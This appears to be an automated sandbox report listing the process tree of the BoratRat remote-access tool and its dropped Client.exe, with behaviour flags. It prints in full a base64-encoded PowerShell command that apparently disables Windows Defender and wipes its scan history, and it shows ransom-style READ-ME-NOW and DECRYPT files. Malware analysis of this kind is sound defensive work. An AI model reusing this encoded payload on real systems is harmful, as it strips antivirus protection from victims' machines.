C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1696
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\Borat\" -spe -an -ai#7zMap29299:68:7zEvent275851⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3420
-
C:\Users\Admin\Desktop\Borat\BoratRat.exe"C:\Users\Admin\Desktop\Borat\BoratRat.exe"1⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3008
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:3964
-
C:\Users\Admin\Desktop\Borat\Client.exe"C:\Users\Admin\Desktop\Borat\Client.exe"1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ACgBzAHAAIAAnAEgASwBDAFUAOgBcAFYAbwBsAGEAdABpAGwAZQAgAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAnACAAJwBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAJwAgAEAAJwAKAGkAZgAgACgAJAAoAHMAYwAuAGUAeABlACAAcQBjACAAdwBpAG4AZABlAGYAZQBuAGQAKQAgAC0AbABpAGsAZQAgACcAKgBUAE8ARwBHAEwARQAqACcAKQAgAHsAJABUAE8ARwBHAEwARQA9ADcAOwAkAEsARQBFAFAAPQA2ADsAJABBAD0AJwBFAG4AYQBiAGwAZQAnADsAJABTAD0AJwBPAEYARgAnAH0AZQBsAHMAZQB7ACQAVABPAEcARwBMAEUAPQA2ADsAJABLAEUARQBQAD0ANwA7ACQAQQA9ACcARABpAHMAYQBiAGwAZQAnADsAJABTAD0AJwBPAE4AJwB9AAoACgBpAGYAIAAoACQAZQBuAHYAOgAxACAALQBuAGUAIAA2ACAALQBhAG4AZAAgACQAZQBuAHYAOgAxACAALQBuAGUAIAA3ACkAIAB7ACAAJABlAG4AdgA6ADEAPQAkAFQATwBHAEcATABFACAAfQAKAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQAKAAoAJABuAG8AdABpAGYAPQAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAXABTAGUAdAB0AGkAbgBnAHMAXABXAGkAbgBkAG8AdwBzAC4AUwB5AHMAdABlAG0AVABvAGEAcwB0AC4AUwBlAGMAdQByAGkAdAB5AEEAbgBkAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAnAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAACgBzAHAAIAAkAG4AbwB0AGkAZgAgAEUAbgBhAGIAbABlAGQAIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZgAgACgAJABUAE8ARwBHAEwARQAgAC0AZQBxACAANwApACAAewByAHAAIAAkAG4AbwB0AGkAZgAgAEUAbgBhAGIAbABlAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAB9AAoACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAAoAJABiAHAAYQBzAHMAPQAkAGIAYQBmAGYAbABpAG4AZwAuAEcAZQB0AFQAYQBzAGsAKAAnAFMAaQBsAGUAbgB0AEMAbABlAGEAbgB1AHAAJwApADsAIAAkAGYAbABhAHcAPQAkAGIAcABhAHMAcwAuAEQAZQBmAGkAbgBpAHQAaQBvAG4ACgAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ACgAKACQAcgA9AFsAYwBoAGEAcgBdADEAMwA7ACAAJABuAGYAbwA9AFsAYwBoAGEAcgBdADMAOQArACQAcgArACcAIAAoAFwAIAAgACAALwApACcAKwAkAHIAKwAnACgAIAAqACAALgAgACoAIAApACAAIABBACAAbABpAG0AaQB0AGUAZAAgAGEAYwBjAG8AdQBuAHQAIABwAHIAbwB0AGUAYwB0AHMAIAB5AG8AdQAgAGYAcgBvAG0AIABVAEEAQwAgAGUAeABwAGwAbwBpAHQAcwAnACsAJAByACsAJwAgACAAIAAgAGAAYABgACcAKwAkAHIAKwBbAGMAaABhAHIAXQAzADkACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcACgAkAHMAYwByAGkAcAB0ACsAPQAnADsAaQBlAHgAKAAoAGcAcAAgAFIAZQBnAGkAcwB0AHIAeQA6ADoASABLAEUAWQBfAFUAcwBlAHIAcwBcAFMALQAxAC0ANQAtADIAMQAqAFwAVgBvAGwAYQB0AGkAbABlACoAIABUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAIAAtAGUAYQAgADAAKQBbADAAXQAuAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgApAH0AJwA7ACAAJABjAG0AZAA9ACcAcABvAHcAZQByAHMAaABlAGwAbAAgACcAKwAkAHMAYwByAGkAcAB0AAoACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewAKACAAIABzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxADsAIABiAHIAZQBhAGsACgB9AAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsACgAgACAAaQBmACAAKAAkAGYAbABhAHcALgBBAGMAdABpAG8AbgBzAC4ASQB0AGUAbQAoADEAKQAuAFAAYQB0AGgAIAAtAGkAbgBvAHQAbABpAGsAZQAgACcAKgB3AGkAbgBkAGkAcgAqACcAKQB7AHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawB9AAoAIAAgAHMAcAAgAGgAawBjAHUAOgBcAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAHcAaQBuAGQAaQByACAAJAAoACcAcABvAHcAZQByAHMAaABlAGwAbAAgACcAKwAkAHMAYwByAGkAcAB0ACsAJwAgACMAJwApAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ACgAgACAAaQBmACgAZwBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAKQB7AHIAcAAgAGgAawBjAHUAOgBcAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAHcAaQBuAGQAaQByACAALQBlAGEAIAAwADsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQB9ADsAYgByAGUAYQBrAAoAfQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AAoAIAAgACQAQQA9AFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuACIARABlAGYAYABpAG4AZQBEAHkAbgBhAG0AaQBjAEEAcwBzAGUAbQBiAGwAeQAiACgAMQAsADEAKQAuACIARABlAGYAYABpAG4AZQBEAHkAbgBhAG0AaQBjAE0AbwBkAHUAbABlACIAKAAxACkAOwAkAEQAPQBAACgAKQA7ADAALgAuADUAfAAlAHsAJABEACsAPQAkAEEALgAiAEQAZQBmAGAAaQBuAGUAVAB5AHAAZQAiACgAJwBBACcAKwAkAF8ALAAKACAAIAAxADEANwA5ADkAMQAzACwAWwBWAGEAbAB1AGUAVAB5AHAAZQBdACkAfQAgADsANAAsADUAfAAlAHsAJABEACsAPQAkAEQAWwAkAF8AXQAuACIATQBhAGsAYABlAEIAeQBSAGUAZgBUAHkAcABlACIAKAApAH0AIAA7ACQASQA9AFsASQBuAHQAMwAyAF0AOwAkAEoAPQAiAEkAbgB0AGAAUAB0AHIAIgA7ACQAUAA9ACQASQAuAG0AbwBkAHUAbABlAC4ARwBlAHQAVAB5AHAAZQAoACIAUwB5AHMAdABlAG0ALgAkAEoAIgApADsAIAAkAEYAPQBAACgAMAApAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQAKACAAIAAkAFMAPQBbAFMAdAByAGkAbgBnAF0AOwAgACQAOQA9ACQARABbADAAXQAuACIARABlAGYAYABpAG4AZQBQAEkAbgB2AG8AawBlAE0AZQB0AGgAbwBkACIAKAAnAEMAcgBlAGEAdABlAFAAcgBvAGMAZQBzAHMAJwAsACIAawBlAHIAbgBlAGwAYAAzADIAIgAsADgAMgAxADQALAAxACwAJABJACwAQAAoACQAUwAsACQAUwAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQAUwAsACQARABbADYAXQAsACQARABbADcAXQApACwAMQAsADQAKQAKACAAIAAxAC4ALgA1AHwAJQB7ACQAawA9ACQAXwA7ACQAbgA9ADEAOwAkAEYAWwAkAF8AXQB8ACUAewAkADkAPQAkAEQAWwAkAGsAXQAuACIARABlAGYAYABpAG4AZQBGAGkAZQBsAGQAIgAoACcAZgAnACsAJABuACsAKwAsACQAXwAsADYAKQB9AH0AOwAkAFQAPQBAACgAKQA7ADAALgAuADUAfAAlAHsAJABUACsAPQAkAEQAWwAkAF8AXQAuACIAQwByAGAAZQBhAHQAZQBUAHkAcABlACIAKAApADsAJABaAD0AWwB1AGkAbgB0AHAAdAByAF0AOgA6AHMAaQB6AGUACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AAoAIAAgACQAVwBQAD0AJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAFcAcgBpAHQAZQAkAEoAIgAsAFsAdAB5AHAAZQBbAF0AXQAoACQASgAsACQASgApACkAOwAgACQASABHAD0AJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAEEAbABsAG8AYwBIAGAARwBsAG8AYgBhAGwAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAGkAbgB0ADMAMgAnACkAOwAgACQAdgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFoAKQAKACAAIAAnAFQAcgB1AHMAdABlAGQASQBuAHMAdABhAGwAbABlAHIAJwAsACcAbABzAGEAcwBzACcAfAAlAHsAaQBmACgAIQAkAHAAbgApAHsAbgBlAHQAMQAgAHMAdABhAHIAdAAgACQAXwAgADIAPgAmADEAIAA+ACQAbgB1AGwAbAA7ACQAcABuAD0AWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AFAAcgBvAGMAZQBzAHMAZQBzAEIAeQBOAGEAbQBlACgAJABfACkAWwAwAF0AOwB9AH0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQAKACAAIAAkAFQAMgAuAGYAMgA9ADEAOwAkAFQAMgAuAGYAMwA9ADEAOwAkAFQAMgAuAGYANAA9ADEAOwAkAFQAMgAuAGYANgA9ACQAVAAxADsAJABUADMALgBmADEAPQAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsANABdACkAOwAkAFQANAAuAGYAMQA9ACQAVAAzADsAJABUADQALgBmADIAPQAkAEgARwAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABTAFoALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAVABbADIAXQApACkACgAgACAAJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAFMAdAByAHUAYwB0AHUAcgBlAFQAbwBgAFAAdAByACIALABbAHQAeQBwAGUAWwBdAF0AKAAkAEQAWwAyAF0ALAAkAEoALAAnAGIAbwBvAGwAZQBhAG4AJwApACkALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAoACQAVAAyAC0AYQBzACAAJABEAFsAMgBdACkALAAkAFQANAAuAGYAMgAsACQAZgBhAGwAcwBlACkAKQA7ACQAdwBpAG4AZABvAHcAPQAwAHgAMABFADAAOAAwADYAMAAwAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawAKAH0ACgAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAAoAJwAgAFMAZQBjAHUAcgBpAHQAeQAgAEMAZQBuAHQAZQByAFwATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAnACwAJwBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAsACcAXABNAHAARQBuAGcAaQBuAGUAJwAsACcAXABTAHAAeQBuAGUAdAAnACwAJwBcAFIAZQBhAGwALQBUAGkAbQBlACAAUAByAG8AdABlAGMAdABpAG8AbgAnACAAfAAlACAAewBuAGkAIAAoACQAdwBkAHAAKwAkAF8AKQAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAfQAKAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAnACAARQBuAGEAYgBsAGUAUwBtAGEAcgB0AFMAYwByAGUAZQBuACAAMAAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAbgBlAHQAMQAgAHMAdABvAHAAIAB3AGkAbgBkAGUAZgBlAG4AZAAKAHMAYwAuAGUAeABlACAAYwBvAG4AZgBpAGcAIAB3AGkAbgBkAGUAZgBlAG4AZAAgAGQAZQBwAGUAbgBkAD0AIABSAHAAYwBTAHMALQBUAE8ARwBHAEwARQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKAHMAdABhAHIAdAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACsAJwBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAHAAQwBtAGQAUgB1AG4ALgBlAHgAZQAnACkAIAAtAEEAcgBnACAAJwAtAEQAaQBzAGEAYgBsAGUAUwBlAHIAdgBpAGMAZQAnACAALQB3AGkAbgAgADEACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABtAHAAZQBuAGcAaQBuAGUAZABiAC4AZABiACcAKQAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwACAAIAAgACAAIAAgACAAIAAgACAAIAAjACMAIABDAG8AbQBtAGUAbgB0AGUAZAAgAD0AIABrAGUAZQBwACAAcwBjAGEAbgAgAGgAaQBzAHQAbwByAHkACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKACcAQAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwADsAIABpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkACgAjAC0AXwAtACMA2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
PID:1448 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵PID:788
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4584 -
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller3⤵PID:2432
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start lsass3⤵PID:2476
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2128
-
C:\Users\Admin\Desktop\Borat\Client.exe"C:\Users\Admin\Desktop\Borat\Client.exe"1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
PID:3592 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\READ-ME-NOW.txt2⤵PID:804
-
C:\Users\Admin\Desktop\DECRYPT.exe"C:\Users\Admin\Desktop\DECRYPT.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\CloseConvertTo.xhtml1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe8b923cb8,0x7ffe8b923cc8,0x7ffe8b923cd82⤵PID:5068
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,7431071974769138954,13518475369368192271,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1980 /prefetch:22⤵PID:3656
-
